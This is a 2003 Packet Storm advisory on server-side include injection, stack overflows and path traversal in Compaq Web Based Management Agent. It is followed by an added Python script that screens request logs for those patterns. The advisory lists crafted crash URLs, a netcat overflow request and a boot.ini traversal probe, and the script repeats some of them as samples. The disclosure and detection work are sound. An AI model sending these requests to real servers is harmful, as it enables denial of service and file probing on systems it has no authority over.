
compaq.txt

Date: 30 Jun 2003
Reported by: Ian Vitek
Type: packetstorm
Source: packetstormsecurity.com

Several vulnerabilities found in Compaq Web Based Management Agent causing server issues.

Code
`SSI vulnerability in Compaq Web Based Management Agent  
======================================================  
  
Type of vulnerabilities:  
Server Side Include injection. Exploitable.  
Stack overflows and access violations. Exploitable?  
Creation of script objects. Exploitable?  
  
Affected Software: Compaq Web Based Management Agent  
Verified Platforms: Windows  
  
Background and problem description  
==================================  
Bashis (bash at wcd.se) has found several vulnerabilities  
in Compaq Web Based Management Agent. This Agent runs on  
TCP port 2301 (HTTP) or 2381 (HTTPS).  
The agent uses "tags" to run functions at the server side.  
To list all tags:  
http://IP:2301/<!.TableDisplayTags>   
  
To crash the agent:  
http://IP:2301/<!>  
Stack overflow (0xc00000fd), Address: 0x77f0c3dc  
http://IP:2301/survey/<!>  
Stack overflow (0xc00000fd), Address: 0x10039869  
  
This crashes the agent too:  
http://IP:2301/<!.StringRedirecturl>  
Stack overflow (0xc00000fd), Address: 0x77f0c3dc  
http://IP:2301/<!.StringHttpRequest=Url>  
Stack overflow (0xc00000fd), Address: 0x77f0c3dc  
http://IP:2301/survey/<!.StringHttpRequest=Url>  
Stack overflow (0xc00000fd), Address: 0x10039869  
  
The cause could be an endless loop (the result  
contains a tag to display a URL, and the result  
contains a tag to display a URL, and the result...)  
  
More strange stack overflows:  
http://IP:2301/<!.ObjectIsapiECB>  
Stack overflow (0xc00000fd), Address: 0x77f0c3dc  
  
Many tags take input that seems vulnerable:  
http://IP:2301/<!.StringIsapiECB=lpszPathInfo>  
Stack overflow (0xc00000fd), Address: 0x77f0c3dc  
  
Send the following with netcat:  
GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0  
Access violation (0xc0000005), Address: 0x100368a5  
  
Check file existence. (with a nice 'input box')  
http://IP:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini  
  
It looks like you could create script objects.  
Check the tags with <!.TableDisplayTags>. Some of the  
CreateObject tags have the parameter 'script'.  
I don't know if it could be done though.  
  
Is this just another remote DoS?  
  
I have mailed HP ([email protected]) and got an automated  
response 28/5 2003.  
  
If someone wants to forward this mail they may do so.  
  
To all of my friends; See you in Vegas!  
The Swedes are coming.  
//Ian Vitek  
  
`
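
A log-screening check for the request patterns listed in the advisory, as an added example that is not part of the original advisory or any HP/Compaq code: it flags `<!...>` tags in request targets (raw or percent-encoded), oversized tag arguments, and `../` sequences in the query string. The function names, the 64-character threshold and the sample request lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Tag syntax as it appears in the advisory's URLs: <!>, <!.Name>, <!.Name=arg>
TAG_RE = re.compile(r"<!(?:\.(?P<name>\w+))?(?:=(?P<arg>[^>]*))?>")
MAX_ARG_LEN = 64  # assumed threshold; the advisory's crash used about 250 characters


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so %3C%21 and %253C%2521 both become '<!'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(request_line):
    """Return sorted finding labels for one HTTP request line ([] if clean)."""
    _method, _, rest = request_line.strip().partition(" ")
    target = rest.rsplit(" HTTP/", 1)[0]
    # Split on the raw '?' before decoding so an encoded %3F cannot move the boundary
    _path, _, query = target.partition("?")
    findings = set()
    for match in TAG_RE.finditer(decode_fully(target)):
        findings.add("ssi-tag:" + (match.group("name") or "(empty)"))
        if len(match.group("arg") or "") > MAX_ARG_LEN:
            findings.add("oversized-tag-argument")
    query = decode_fully(query)
    if "../" in query or "..\\" in query:
        findings.add("path-traversal-in-query")
    return sorted(findings)


# Constructed sample request lines, modelled on the URLs in the advisory
SAMPLES = [
    "GET /index.htm HTTP/1.0",
    "GET /<!.TableDisplayTags> HTTP/1.0",
    "GET /%3C%21.DebugSearchPaths%3E?Url=%2F..%2F..%2Fboot.ini HTTP/1.0",
    "GET /<!.FunctionContentType=" + "A" * 250 + "> HTTP/1.0",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(inspect_request(line) or "clean", "<-", line[:70])
```

The same matching logic can back a reverse-proxy or IDS rule in front of ports 2301 and 2381, where requests carrying a tag can be dropped before they reach the agent.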
